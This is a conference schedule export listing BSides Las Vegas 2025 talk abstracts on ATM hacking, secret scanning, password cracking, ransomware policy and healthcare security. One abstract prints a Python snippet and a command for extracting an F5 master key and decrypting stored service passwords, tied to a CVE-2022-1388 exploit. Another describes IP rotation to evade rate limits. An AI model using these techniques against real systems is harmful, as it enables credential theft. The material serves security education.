Sage PUBLISH Z3RMSJ@@pretalx.com -Z3RMSJ Take all my money – penetrating ATMs en en 20250805T180000 20250805T182500 002500

Take all my money – penetrating ATMs

In this presentation we will discuss real-world examples of cybersecurity issues with ATMs. Ever wondered what it takes to make an ATM spewing out cash? You’ll hear some war stories from Fredriks career when penetration testing ATMs which includes the technical aspects of ATM hacking like tools but also troubles that can arise when trying to set up an ATM test. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/Z3RMSJ/ Firenze Jonathan Fischer Fredrik Sandström PUBLISH X7ERWF@@pretalx.com -X7ERWF Broke but Breached: Secret Scanning at Scale on a Student Budget en en 20250805T183000 20250805T185500 002500

Broke but Breached: Secret Scanning at Scale on a Student Budget

Secrets are being pushed everywhere in the wild. Given that most major security breaches involve secrets being exposed—like the SolarWinds breach and many others—I became fascinated by how often secrets are being publicly leaked and how little effort it can take to find them if you know where to look. I wanted to perform secret scanning at scale, but I’m a student with a limited budget. So I’m going to talk about how I maximized the compute power available to me using Kubernetes and leveraged it to scan for secrets at scale. ### Infrastructure Setup: Given my constraints as a broke college student, I looked at what I had available: I recently completed my CKA and CKS certifications, and I had access to $100 in free Azure credits through a student account, plus similar free-tier resources across various cloud providers. My solution? Use Kubernetes to orchestrate compute resources across multiple accounts. To set up the infrastructure, I used K3s to run a master node on my Azure account using those $100 credits very carefully. Then, I asked a few friends—also students—to use their own free credits to spin up virtual machines in their Azure accounts. I connected all of these together using Tailscale, putting them on the same virtual network. K3s was the best choice due to its lightweight footprint and simplicity. Right now, I’m building out a Terraform configuration so I can just give my friends a link to my Terraform Cloud project. That way, they can deploy their own VM and have it automatically join my cluster. This assumes a level of trust between me and them. I’m actively working on a secure abstraction layer so they can deploy without being exposed to (or able to access) any secrets. #### Scanning VS Code Extensions: The next phase of the project is to scan VS Code extensions for secrets. It might seem like overkill, especially considering Microsoft’s API rate limits, but I have a workaround. Here’s how it works: - Every morning, a Kubernetes CronJob spins up and pulls a fresh list of VS Code extensions recently published to the marketplace. - These extensions are then distributed to Docker containers running TruffleHog, which scan them for known patterns of exposed secrets. - Redis is used for fast, in-memory storage of scan results. - Every 3 minutes, Redis syncs with a persistent master database for durability and redundancy. - All of this orchestration and data handling is written in Go. ##### API Rate Limiting and IP Rotation: Microsoft is fairly generous with rate limits, but I wanted to plan for scale. I set up a paid VPN service and developed a solution where IP addresses are rotated using a FIFO queue in AWS SQS. IPs are rotated in and out of the queue based on usage, helping me work around API rate limits. This idea is still being refined, but it's designed to allow future scaling with more nodes and broader scanning capabilities. ### Current Status: To test the idea, I wrote a quick set of Python 3 scripts and downloaded around 10,000 VS Code extensions. I’ve already identified exposed credentials including: OpenAI keys, Hugging Face tokens ,AWS credentials, SSH private keys, And more Since this initial proof of concept was successful, I plan to slowly expand the setup, refine the automation, and run these scans at a scale as explained above. ### Tools: Kubernetes (K3s) Tailscale (networking) Terraform Cloud (for easy node deployment) Docker TruffleHog – https://github.com/trufflesecurity/trufflehog Redis (fast key-value storage) GoLang (core orchestration logic) Python3 (initial PoC + scraping scripts) AWS SQS (FIFO) – used for VPN IP queueing Amazon DocumentDB (it's in always free tire) --- ### 📌 A Note to the CFP Review Board **Just a quick note** — *I'm still working on the explained setup for my talk*, and the outline I'm submitting right now reflects my current plan. *Some things might evolve* as I make progress and depending on how everything comes together. Also, *please reach out to me before the talk title is published on the website.* I’m planning to collaborate with a few folks and want to give them a heads-up before anything goes public. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/X7ERWF/ Firenze Ming Chow Raviteja PUBLISH 7EYXUL@@pretalx.com -7EYXUL Reversing F5 Service Password Encryption en en 20250805T100000 20250805T102000 002000

Reversing F5 Service Password Encryption

This technique was developed in 2022 by X-Force and withheld from broader distribution for several years to protect the broader community. Now that its 2025 the weaponized version of the CVE-2022-1388 exploit will be released (we modified a zephyphish exploit), the gist of it is this: 1. retrieve f5 master key from unit with `f5mku -K` and that gives the master key 2. the password storage is effectively AES-128 in Electronic Codebook Mode, as demonstrated with this python snippet # get the master key from the F5 master_key_str = get_master_key(target_url) # decode the master key master_key_data = base64.b64decode(master_key_str) # its basically salted AES in ECB mode aes = AES.new(master_key_data, AES.MODE_ECB) # loop over the goods to decrypt for ciphertext in password_list: # grab everything past $M$xx$ which is the cyphertext cipher_data = base64.b64decode(ciphertext[6:]) # we store in cleartext because we need to chop off the salt and decode it cleartext = aes.decrypt(cipher_data) # displaytext = decoded text with salt displaytext = cleartext.decode("utf-8") # xtext is what we finally show after the salt has been removed, the value of xx above xtext = displaytext.removeprefix(ciphertext[3:5]) # show the final text print("Ciphertext: " + str(ciphertext) + " Cleartext: " + xtext) return This really could be 10 minutes but I'm going to add some history to the talk PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/7EYXUL/ Tuscany Dustin Heywood PUBLISH JAZY78@@pretalx.com -JAZY78 Phish-Back: How to turn the problem into a solution. en en 20250805T103000 20250805T105000 002000

Phish-Back: How to turn the problem into a solution.

As explained in the abstract, I worked as a SOC Manager for international companies for nearly 10 years. A little over two years ago, I was confronted with the worst cyber crisis management of my career due to spear phishing. I then came up with this “phish-back” strategy to finally regain technical control over the issue of identity theft, which is currently mainly managed through employee awareness. As there has been very little public research on this topic, the team I put together has experimented and learned how to create the best defensive phishing techniques. The goal of this approach is to create fake pages exposed to the internet that would tempt attackers to try out what they have stolen in order to gain access to the network. The goal of this talk is to present our work and explain to technical teams how they can implement such a strategy in their organization. There are many technical pitfalls to avoid and a huge amount of reverse engineering to anticipate in order to prevent adversaries from discovering that this is a fake gateway to the network. The 20-minute talk will consist of approximately 15 minutes of technical presentations/demos and 5 minutes of context and results. The part that excites me the most is presenting the results we have observed over the last two years. As a technical expert and pentester, I knew the strategy was great, but I had no idea that attackers would take the bait so readily. I am very happy to present these research results and give back to the community. You may notice that I have built a company around this strategy after working on it for many months as a side project with my team. I am passionate about cyber security above all else, and the name of our company or the products we sell will never be mentioned once in the presentation. I have attended dozens of conferences in my life, and nothing would annoy me more than seeing someone come and sell something at this type of conference. This is first and foremost a technical conference, by an enthusiast and for enthusiasts. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/JAZY78/ Tuscany Gautier Bugeon PUBLISH NK9P3P@@pretalx.com -NK9P3P Lessons from Black Swan Events and Building Anti-Fragile Cybersecurity Systems en en 20250805T110000 20250805T112000 002000

Lessons from Black Swan Events and Building Anti-Fragile Cybersecurity Systems

Dumpster fires litter the virtual landscape defined by unpredictability and accelerating digital threats, cybersecurity must evolve beyond traditional notions of resilience. In this compelling session, Dave Lewis explores how organizations can move past merely withstanding disruption to actively benefiting from it by building anti-fragile cybersecurity systems. Borrowing from the work of Nassim Nicholas Taleb, Dave will introduce the concept of anti-fragility—the idea that certain systems grow stronger when exposed to volatility, shocks, and stressors—and examine its practical relevance in today’s cybersecurity landscape. Through vivid real-world examples, including a deep dive into the global impact and lessons learned from the WannaCry ransomware attack, Dave will illustrate how black swan events can expose critical systemic weaknesses—but also create opportunities to reimagine how we defend our digital environments. He will argue that while advanced security solutions play a role, it’s the foundational elements—such as password management, widespread adoption of multi-factor authentication, and a culture of cyber awareness—that often make the difference between a breach and a bullet dodged. This session is designed to equip security professionals, technical leaders, and business stakeholders with actionable guidance to help their organizations not just survive the next unexpected crisis, but emerge stronger because of it. Attendees will leave with a clear understanding of anti-fragile principles and how to apply them to create cybersecurity programs that are not just reactive or robust, but dynamically adaptive in the face of chaos. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/NK9P3P/ Tuscany Dave Lewis PUBLISH XTUW3N@@pretalx.com -XTUW3N Taking down the power grid! en en 20250805T140000 20250805T144500 004500

Taking down the power grid!

The talk is a step by step warstory on how we as a Red Team was able to go from nothing to physical access to the EMP secure server room with the servers that control the power grid for a large part of the country. It contains topics such as infrastructure hacking, default passwords, PIN code "eavsdropping", access card encryption key revelation, access card cloning, social engineering, etc. It is a scary story on how it was possible to get access to the EMP secure server room for a power company, and place a dummy bomb bomb. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/XTUW3N/ Tuscany John-André Bjørkhaug PUBLISH KX3CRZ@@pretalx.com -KX3CRZ What to Tell Your Developers About NHI Secrets Security and Governance en en 20250805T150000 20250805T154500 004500

What to Tell Your Developers About NHI Secrets Security and Governance

Non-Human Identities (NHIs) outnumbered humans 45 to 1 in 2022. Given that their access abuse is one of the most easily exploited attack paths, we really need to get a handle on NHI security right now. But how do we start? What do we even tell the developer? We can't tell them to just not keep building applications and secrets security alone has not addressed all the concerns NHI security requires. Once again, OWASP is here to shed some light on the situation right as this issue becomes a major, main steam concern. In January of 2025, they released the Top 10 Non-Human Identity Risks, which highlights exactly how NHIs keep getting exploited and gives us a guide to raising awareness and prioritizing and remediating the situation inside our organizations. But they are not the only ones who released a guide or even a top 10 list. This talk will guide us through the commonalities of all the published wisdom around NHI security, and we will end with a discussion that governance is a path forward but will need to go through IAM and, eventually, the whole organization. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/KX3CRZ/ Tuscany Dwayne McDaniel PUBLISH 7PHURF@@pretalx.com -7PHURF Cracking 936 Million Passwords en en 20250805T170000 20250805T174500 004500

Cracking 936 Million Passwords

0 About Me 1 A brief history of password cracking 2 Dump from Have I Been Pwned Good news – they are NTLM format Bad news – 936,000,000 This requires a Big Data approach and lots of RAM 3 Hardware and software used Strategy used to crack passwords Rainbow Tables Good for finding a few passwords, bad for finding millions of passwords John the Ripper Infrequent official releases, Many unofficial releases Poor Graphical Processor Unit (GPU) windows support Easy to make custom rules Good mailing list support Hashcat 6.2.6 latest release Sep 2022 Great GPU acceleration Primitive rule syntax Dictionary attacks takes a lot of memory Custom Tools I wrote Custom Rules The exponential cost of finding passwords You will never find all of the passwords 4 Found passwords Found password statistics Control characters in passwords 5 Defense against having your password cracked Don't use NTLM 2 factor authentication Use cryptographically strong random passwords Use a password manager PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/7PHURF/ Tuscany Jeff Deifik PUBLISH QPBRHA@@pretalx.com -QPBRHA Cracking Hidden Identities: Understanding the Threat Surface of Hidden Identities and Protecting them Against Password Exposure en en 20250805T180000 20250805T184500 004500

Cracking Hidden Identities: Understanding the Threat Surface of Hidden Identities and Protecting them Against Password Exposure

This talk is based on research conducted by LayerX Security on its customer base, analyzing the identity and password security practices of end users for both corporate and non-corporate accounts. Some of the parameters for which we have metrics include: • Password strength (for both corporate and non-corporate accounts) • Usage patterns (of corporate vs. non-corporate account activity on SaaS apps) • Details of password re-use and cross-account password sharing • Account sharing between users • Usage patterns of SSO on corporate accounts (and SaaS applications) • Analysis of user password exposure based on public data breach databases • And more Some key highlights from the research: • Corporate Passwords are Just as Weak as Personal Passwords: Over 54% of corporate passwords are classified as medium strength or below, meaning modern password-cracking tools and hardware could easily break them. This is remarkably close to the percentage of risky non-corporate passwords, where 58% of personal passwords were medium-strength or below. • Enterprises Are Blind to Most Identity Usage: Over 40% of SaaS applications in organizational networks are accessed via personal credentials. Moreover, over two-thirds of corporate login events are done without SSO. Together, they account for over 80% of SaaS activity on corporate networks and endpoints. This means security and IT teams are blind to usage of these accounts, and have little-to-no visibility and control over their activities, security controls (such as password security policies) or where they are used. • Just 2% of Users Are Organizations’ Biggest Security Risk: These are users who have a history of exposure that includes exposed passwords, do not use SSO-backed passwords, and have weak passwords that can be easily cracked. If cybersecurity is all about risk management, these users are the biggest risk you should worry about. • Browser Extensions are a Significant Threat to Users’ Identity: 66.6% of extensions have ‘high’ or ‘critical’ -level permissions and 40% of users have such extensions installed. 13% of extensions have access to users’ cookies, meaning they could potentially use those cookies and access tokens to steal corporate identities In this talk, we’ll cover the research in detail to provide a strong empirical foundation and then use it to identify key password risks in the new ‘SaaS’ economy and offer actionable best practices and guidelines to address these gaps. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/QPBRHA/ Tuscany Or Eshed PUBLISH KZGVRJ@@pretalx.com -KZGVRJ Global BSides Organizers Un-Conference Meet-Up en en 20250805T190000 030000

Global BSides Organizers Un-Conference Meet-Up

Global BSides Organizers Un-Conference Meet-Up This year, we're adding a little light structure so we can gauge topics and have more non-blocking conversations. If you organize a regional BSides conference, come hang out with your colleagues, make some connections, and learn! PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/KZGVRJ/ Tuscany milqtst PUBLISH AHT3D8@@pretalx.com -AHT3D8 Mental Models to Anticipate the Next Stages of the AI and Cybersecurity Revolution en en 20250805T100000 20250805T104500 004500

Mental Models to Anticipate the Next Stages of the AI and Cybersecurity Revolution

AI and cybersecurity threats are evolving at rapid pace and unfortunately, many of us are often caught off guard, reacting tactically to the latest issues rather than thinking strategically about what might come next. This talks delves into the power of mental models as a proactive tool to better understand, anticipate, and mitigate both current and future AI and cybersecurity risks. I will cover several different mental models, such as the Cynefin Model, People Process Technology trio, OSI model, DIKW Pyramid, NIST CSF, Kahneman’s System 1 and 2, OODA loop, Cyber Defense Matrix, DIE Triad, and more. Moreover, I’ll show what I have newly discovered when I combined these mental models. These new discoveries point directly to currently emerging and previously unforeseen risks, but they also reveal patterns for how to address these risks. This is not just a theoretical discussion. These mental models support clear thinking for decision making and produce insights that can be translated into tactical actions. For example, the Cynefin model when combined with the People Process Technology trio reveal the hard limits of automation and indicate when we should rely upon technology vs services to tackle new challenges, such as GenAI. In another example, combining the DIKW Pyramid with the Cyber Defense Matrix and the OSI model shows fundamental flaws in data-centric approaches when dealing with the leakage of sensitive content through LLMs. I'll use the OODA loop to show how it can be applied to Agentic AI and what type of controls we will need to secure them. Without the insights that these models reveal, we will approach the future blind. Even worse, we might approach the future with a false sense of assurance that our current controls will continue to work. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/AHT3D8/ Siena Sounil Yu PUBLISH XH9W7Q@@pretalx.com -XH9W7Q Advancing Network Threat Detection Through Standardized Feature Extraction and Dynamic Ensemble Learning en en 20250805T110000 20250805T112000 002000

Advancing Network Threat Detection Through Standardized Feature Extraction and Dynamic Ensemble Learning

This research from my undergraduate senior thesis for my degree in Applied Computer Science - Cybersecurity from the University of South Carolina to be conferred in May 2025. Through my prior work in Infosec and an extensive literature review, I found deficiencies in both traditional NIDS solutions and ML-driven detection experiments that rely too heavily on limited datasets and monolithic classifiers. Over the past 18 months, I developed a feature extraction framework standardizing packet and flow statistics to enhance model generalization across multiple environments, including CTU-13, TON_IoT, USTC-TFC2016, and custom-collected benign traffic. Eight machine learning models were selected to represent varied classification strategies: Random Forest, Isolation Forest, Gaussian Mixture Models, Quadratic Discriminant Analysis, AdaBoost, XGBoost, CNN, and RNN. I then designed the Ford-CSWV ensemble algorithm, which applies dynamic class-specific weighting to model outputs during classification, improving robustness across traffic variations. Experimental results demonstrate that while the ensemble yields only minor gains in overall accuracy compared to top individual models, it significantly improves stability and adaptability, which are critical for real-world implementations. The talk will include a detailed walkthrough of the difference between NIDS and NDR, feature selection rationale, model training approaches, the mechanics of the Ford-CSWV ensemble classifier, and the classification results of my experiment. Slides include dataset comparisons, classifier diagrams, and ensemble methodology visuals. I will not be conducting a live demo, but the session will be highly visual and practical, and designed for security practitioners, researchers, and students interested in applied ML for cybersecurity. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/XH9W7Q/ Siena Jason Ford PUBLISH 8KYQ3Q@@pretalx.com -8KYQ3Q Increasing Complexity and Frequency of Cyber Events: Trends, Costs, and Risk Mitigation Strategies en en 20250805T140000 20250805T144500 004500

Increasing Complexity and Frequency of Cyber Events: Trends, Costs, and Risk Mitigation Strategies

The cyber claims and risk environment are evolving. The year 2024 was a record-breaking year for cyber events. The continued threat of ransomware events and cyber events growing complexity. Cyber risk associated with 3rd party increase in complexity and frequency. Understanding digital supply chain risk is essential to cyber risk management. This session will show attendees what some of the cost factors and ways to navigate the changing risk environment. Marsh McLennan collects cybersecurity incidents, cybersecurity controls, claims data from thousands of organizations in its client portfolio. There are different organization-dependent factors that contribute to the severity of cyber events. These include record counts and types in possession, industry, revenue, and cyber security controls. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/8KYQ3Q/ Siena Wendy Hou-Neely PUBLISH TKNLJQ@@pretalx.com -TKNLJQ RAG Against the Machine: Using Retrieval-Augmented Generation and MCP to Fortify Cybersecurity Defenses en en 20250805T150000 20250805T154500 004500

RAG Against the Machine: Using Retrieval-Augmented Generation and MCP to Fortify Cybersecurity Defenses

In this session, I will present the architecture, use cases, and lessons learned from deploying CADDIE, a self-hostable Retrieval-Augmented Generation platform tailored to cybersecurity. With growing adoption of LLMs, enterprises are facing a gap: how to contextualize outputs with real, trusted data across threat detection, policy writing, and compliance monitoring. This is where the Model Context Protocol (MCP) shines—allowing structured ingestion of logs, threat intelligence, policy documents, and MITRE mappings into an LLM interface. Attendees will see: How MCP structures retrieval pipelines and token-efficient prompts RAG in action for GRC (e.g., SOC 2, ISO 27001, DORA) and threat detection workflows Case studies from proof-of-concepts with financial institutions, think tanks, and public-sector orgs Why context-aware GenAI reduces hallucinations and increases interpretability in cyber operations Red team and blue team applications of MCP: from compliance automation to contextualized alert triage This talk draws on prior research and presentations, including Black Hat 2024 (“Leveraging RAG for Proactive Cybersecurity Posture”) and my AI Summit talk on RAG-powered policy agents. Attendees will leave with an understanding of how to incorporate RAG in their cyber environments and how structured context via MCP is a key defense layer when working with LLMs in production PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/TKNLJQ/ Siena Brennan Lodge PUBLISH GTYAKW@@pretalx.com -GTYAKW Predicting the Lifespans of Internet Services: Falling down the ML Rabbit Hole, and What We Learned From The Thud en en 20250805T170000 20250805T174500 004500

Predicting the Lifespans of Internet Services: Falling down the ML Rabbit Hole, and What We Learned From The Thud

One key aspect of Internet-Wide scanning research is “When should I scan this entity again?”. In this talk, I talk about how descriptive analyses (presented last year!) are insufficient in finding trends at an Internet-scale, and instead a better way to tackle this question is via a more methodological approach with ML techniques. In this talk, I go over the promises of ML, and what we faced in reality at each step of the way. While we were inevitably successful in applying ML techniques to our use case, it does illuminate that sometimes you can’t just throw an ML model at the problem naively, especially when you have so many contextual aspects to account for, and the need to re-work your outputs and expectations to match a more realistic model. Specifically, my talk will cover the following: 1) How did we get here? - Last year we were like WOAH, lots of differences, but then trying to apply it in practice meant shifting the question to “can we predict the lifespan of a service”, such that we can predict when to scan it again? 2) What were the promises of ML? - ML models would help with prediction, and also bring up interesting facets such as feature importance (should we be scanning based on port, or port and some other variable?). - We tried some straightforward methods based on our inputs and outputs and immediately ran into some crazy and gnarly problems 3) Taking a step back – what do we need, and what do we have? - We have a highly multi dimensional categorical dataset that we really cannot change. - We really want to know when we should rescan something, or even a gradient of “scan these more, scan these other ones less” 4) Reframing the question and recognizing the aspects we couldn’t change led us down a new path - Can we predict ephemerality? Which allows us to bucket hosts that we need to rescan more frequently vs hosts that we dont need to rescan more frequently - Yes!! We can. 5) Now that we found a model that worked for us, we discuss evaluation and metrics - Typically you focus on things like precision, recall, and f1 scores, and we see some variance in those that is not unexpected given the output data (walk through this example) - In practical settings, we might want to reframe our metrics to be - We also show which features are most important to the prediction, which is slightly different than our hypothesis going into the problem, but not wholly unexpected PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/GTYAKW/ Siena Ariana Mirian PUBLISH ZRBVME@@pretalx.com -ZRBVME Indexing the Chaos: Extract PII from Ransomware Leaks en en 20250805T180000 20250805T184500 004500

Indexing the Chaos: Extract PII from Ransomware Leaks

The tool was developed as a response to a growing blind spot in breach awareness: unstructured data dumped by ransomware gangs. Traditional tools focus on structured email/password leaks. In contrast, ransomware leaks are a dumpster fire of scanned ID cards, tax records, and resumes, usually dropped on .onion sites or mirror dumps. No one wants to parse that—so I did. This talk breaks down how I built: A crawler (breach.house) that collects dump data (Ransomware Leaks, Normal Breaches, Stealer Logs, Leads) A backend pipeline that: Ingests mixed-format files (PDF, DOC, images, databases, etc.) Uses OCR to extract text from image-based leaks Feeds results into a fine-tuned LLM that recognizes contextual PII A frontend search engine (haveibeenransom.com) that shows only metadata, not PII, and flags where data might have been exposed. This talk will explain how I implemented protections to comply with privacy law (GDPR, Article 6) and prevent misuse. No PII is shown. Users can only search identifiers (email, passport number) and see where it may have appeared—without downloading any leak. This tool is open-source (in part) and still under active development. It’s a blend of OSINT, NLP, ethical grey zones, and threat intelligence, all rolled into one live system. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/ZRBVME/ Siena Juanma PUBLISH KQWJAH@@pretalx.com -KQWJAH Power Play: AI Dominance Depends on Energy Resilience en en 20250805T100000 20250805T110000 010000

Power Play: AI Dominance Depends on Energy Resilience

The United States faces a multifaceted challenge in maintaining its technological edge, particularly in AI. While much attention is given to semiconductor production and algorithm development, the foundation of AI supremacy lies in a stable, resilient, flexible, and abundant energy infrastructure. Private capital flows into chips and frontier models; government agencies and labs can only chase and shape the attention of resources. Disruptions in one sector can profoundly impact another: recent challenges, such as the extreme shortage of voltage step-down transformers and heavy reliance on non-domestic equipment, significantly hinder the growth and expansion of AI data centers. Moreover, U.S. utilities and energy projects remain heavily reliant on non domestic equipment - for large and distribution power transformers, battery energy storage systems, and communications equipment - introducing potential cybersecurity risks that could destabilize power grids and erode energy resilience. China's control over critical mineral processing further compounds U.S. supply chain fragility, threatening to disrupt key industries essential for AI infrastructure. This interconnectedness demonstrates that dominance in AI is not just about computational performance but about securing and optimizing the power that fuels it. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/KQWJAH/ Copa Emma M Stewart Munish Walther-Puri PUBLISH JKHHMR@@pretalx.com -JKHHMR Ransomware As Canary For Societal Disruption en en 20250805T110000 20250805T113000 003000

Ransomware As Canary For Societal Disruption

Ransomware, like other e-crime actions, is typically viewed as a nuissance and a law enforcement matter from a policy and strategic perspective. However, the economic impact of ransomware (along with other crimes such as business email compromise) is vast, while the disruptive impact - to schools, hospitals, the industrial base, and civil functions - is immense. Compared to actual cyber "attacks" outside of events in Ukraine, ransomware has arguably had a much greater impact on societal function than any "APT" intrusion or incident across the developed world. To set the stage, we will first review the persistent and long-standing e-crime epidemic and particularly disruptive events such as ransomware that induce loss of availability and functionality. While ransomware carries a significant economic cost in payouts and lost output, there is also a non-trivial social cost in lost functionality related to the operations of schools, hospitals, local governments, and similar entities. When reviewed in detail, especially in the cases of rural hospitals and similar disadvantaged entities, ransomware may serve as a killing function for vital services for marginalized populations. With this context in mind, we can then review the nature of ransomware operations: often aligning or overlapping with the same tactics, techniques, and procedures employed in supposedly more concerning state-sponsored intrusion operations. Based on this threat actor convergence in behavior, we see an interesting opportunity: that defending against and closing opportunities to criminal actors will improve community defense against a variety of threat actors. For example, the rapid weaponization and exploitation of vulnerabilities in edge devices represents a primary initial access mechanism for both state-sponsored and criminal entities. Developing and implementing planning to more rapidly address these items while advocating for improved development and engineering practices at vendors may thus reduce the impact and likelihood of an incident from multiple threats. However, defensive measures cannot just be passive in nature. The critical nature of disruptive ransomware to vital societal functions also demands active measures to reduce the scope of adversary activity. This "impose cost" approach is increasingly popular in the current administration, but carries operational and ethical costs depending on how far it is pushed. Yet simply standing by and letting adversaries operate with relative impunity places a significant burden on often poorly-resourced organizations to respond to and mitigate against such threats. Therefore, we will discuss a "reasonably effective and ethically supported" approach to counter-ransomware operations focused on targeting adversary infrastructure, operations, and communication networks for disruption utilizing law enforcement and other authorities. From this discussion, we will arrive at a conclusion where the ransomware (and broader e-crime) threat is simply no longer sustainable under current mechanisms. By providing for response functions both passive and active in nature, we can "drain the swamp" of ransomware operations to provide greater resilience to critical societal functions across the western world. Furthermore, doing so may not just dramatically alter matters with respect to criminal entities, but have the positive externality of making life significantly harder for state-sponsored hacking teams to breach critical infrastructure entities for more focused and targeted disruption. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/JKHHMR/ Copa Joe Slowik PUBLISH LNMTZM@@pretalx.com -LNMTZM Emergency & Urgent Care Remains in Critical Condition en en 20250805T140000 20250805T160000 020000

Emergency & Urgent Care Remains in Critical Condition

Hospitals and trauma centers are increasingly targeted by sophisticated cyber threats that jeopardize patient safety, disrupt critical care, and compromise sensitive health data. In 2025, the healthcare sector remains one of the most attacked industries, with ransomware, phishing, and supply chain disruptions posing daily risks to clinical operations. These threats are especially acute in trauma centers, where even brief system outages can result in life-threatening delays. This panel will explore the evolving cybersecurity landscape facing healthcare providers, with a focus on high-impact vulnerabilities such as legacy medical devices, unsegmented networks, and third-party software dependencies. Panelists will discuss recent incidents and their cascading effects on emergency care delivery, as well as the broader implications for public health and national security. The discussion will also highlight emerging policy challenges, including the impact of new federal funding and regulatory frameworks. In addition, the panel will explore operational mitigations such as zero-trust architectures, incident response planning, and workforce training. Dr. Dameff will provide an informational briefing on an ARPA H project that he is working on. In this session, Beau Woods shares his unexpected journey into the world of medical device security—a path that began with curiosity and evolved into a mission to protect lives. As a prominent voice in the "Hackers for Health" movement, Woods will recount how he first encountered vulnerabilities in life-critical systems and the profound ethical questions that followed. Unlike traditional cybersecurity domains, hacking medical equipment involves systems that are directly connected to human bodies—pacemakers, infusion pumps, ventilators, and more—where even minor disruptions can have life-or-death consequences. Attendees will gain a deeper understanding of the systemic risks facing healthcare infrastructure and leave with actionable insights into how policy, technology, and cross-sector collaboration can strengthen resilience in the face of growing cyber threats. PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/LNMTZM/ Copa Beau Woods Christian Dameff Dina Carlisle PUBLISH TLPNPG@@pretalx.com -TLPNPG Hackers Kinda Like to Eat en en 20250805T170000 20250805T180000 010000

Hackers Kinda Like to Eat

This session will explore the dual challenges facing the food sector: the growing frequency and sophistication of cyberattacks, and the economic concentration that amplifies their impact. With a small number of corporations controlling large portions of meat processing, grain distribution, and food logistics, a single cyber incident can ripple across the entire national food supply. The 2021 ransomware attack on JBS Foods, the world’s largest meat processor, is a stark example of how digital vulnerabilities can threaten food availability, pricing, and public trust. Panelists will examine the policy landscape, including the role of the Food and Agriculture Sector Coordinating Council, recent CISA advisories, and the implications of proposed cybersecurity mandates for critical infrastructure. The discussion will also address economic incentives and disincentives for cybersecurity investment in a low-margin industry, and the need for public-private collaboration to build resilience. Attendees will gain a deeper understanding of the systemic risks facing the food industry, the policy levers available to mitigate them, and the urgent need to treat food security as a national cybersecurity priority. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/TLPNPG/ Copa Curtis Hanson Whitney Bowman-Zatzkin Andrew Rose PUBLISH NB8XNJ@@pretalx.com -NB8XNJ End of Life (EOL) Equipment should not mean End of Life (Your Life) en en 20250805T182000 20250805T192000 010000

End of Life (EOL) Equipment should not mean End of Life (Your Life)

This panel will examine the multifaceted challenges of managing EOL technology in high-risk environments. Topics will include the operational and financial barriers to replacing legacy systems, the risks of continued reliance on unsupported software and hardware, and the ethical dilemmas faced by defenders who must secure the unsecurable. Panelists will also explore real-world incidents where forever-day vulnerabilities were exploited, and the cascading consequences that followed. The discussion will highlight emerging policy proposals aimed at mitigating these risks, including mandatory lifecycle planning, incentives for modernization, liability frameworks for unsupported systems, and the potential role of government-backed vulnerability research and mitigation programs. Attendees will gain insight into how public and private stakeholders can collaborate to reduce systemic exposure, prioritize critical upgrades, and build a more resilient digital ecosystem. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/NB8XNJ/ Copa Silas Cutler Paul Roberts Stacey Higginbotham PUBLISH CBW9Y8@@pretalx.com -CBW9Y8 BSides Pub Quiz en en 20250805T210000 030000

BSides Pub Quiz

BSides Pub Quiz PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/CBW9Y8/ Copa PUBLISH DZ7B39@@pretalx.com -DZ7B39 Proving Ground Mentors Meet-Up en en 20250805T190000 20250808T200000 010000

Proving Ground Mentors Meet-Up

A meet-up for Proving Ground Mentors, past or present. Hang out and chill poolside with your fellow BSides heroes. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/DZ7B39/ Pool PUBLISH HHVRQ9@@pretalx.com -HHVRQ9 Data Science Meet-Up en en 20250805T190000 010000

Data Science Meet-Up

Data Science Meet-Up PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/HHVRQ9/ Pool PUBLISH GUPQKX@@pretalx.com -GUPQKX Speaker Reception en en 20250805T200000 020000

Speaker Reception

2025 BSides LV Speaker Reception. Come meet and hang out with the Program Committee and your fellow presenters at a private poolside function. PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/GUPQKX/ Pool PUBLISH MYMJAW@@pretalx.com -MYMJAW BSides Karaoke en en 20250805T220000 040000

BSides Karaoke

Security BSides Karaoke, poolside! PUBLIC CONFIRMED Event4HR https://pretalx.com/security-bsides-las-vegas-2025/talk/MYMJAW/ Pool PUBLISH MEABSP@@pretalx.com -MEABSP Recovery Hackers, Tuesday en en 20250805T193000 20250805T213000 020000

Recovery Hackers, Tuesday

